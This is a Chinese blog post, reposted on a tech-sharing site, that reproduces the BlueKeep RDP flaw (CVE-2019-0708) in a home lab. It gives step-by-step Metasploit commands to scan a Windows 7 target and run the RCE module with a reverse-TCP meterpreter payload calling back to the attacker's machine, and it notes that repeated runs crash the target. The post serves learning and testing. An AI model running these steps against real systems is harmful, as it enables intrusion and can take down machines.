ICode9

精准搜索请尝试: 精确搜索
首页 > 其他分享> 文章详细

CVE-2019-0708漏洞复现

2021-05-19 16:01:18  阅读:197  来源: 互联网

标签:R2 Windows SP1 x64 7601 0708 2019 6.1 CVE


漏洞概述

远程桌面服务高危远程代码执行漏洞(CVE-2019-0708),老是有系统爆这个漏洞,但是很少能有利用的,今天搭环境来测试以下利用条件。

涉及系统版本

Windows 7 SP1 / 2008 R2 (6.1.7601 x64)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Virtualbox 6)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 14)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - VMWare 15.1)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - Hyper-V)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - AWS)
Windows 7 SP1 / 2008 R2 (6.1.7601 x64 - QEMU/KVM)

不涉及系统版本

windows 10
windows 8

漏洞复测

攻击机:kali2021 IP: 192.168.2.103
靶机:windows7 IP:192.168.2.109

1、搜索msf支持的0708模块

search 0708

2、利用扫描模块探测目标系统是否存在漏洞

use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
show options
use rhosts 192.168.2.109 //设置目标
run


表示目标存在0708漏洞

3、设置攻击模块参数

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce //设置攻击模块
show options
set rhosts 192.168.2.109 //设置目标
set lhost 192.168.2.103  //设置shell监听IP,监听端口默认即可
set payload windows/x64/meterpreter/reverse_tcp //设置payload

4、设置攻击模式,最终攻击设置如下图

show optinos targets //查看攻击模块支持的系统
set target 1         //设置攻击模块模式1
show options

5、执行攻击获取meterpreter,看起来一切顺利

run

6、多运行几次payload,发现计算机蓝屏

声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合!

标签:R2,Windows,SP1,x64,7601,0708,2019,6.1,CVE
来源: https://www.cnblogs.com/renhaoblog/p/14785381.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有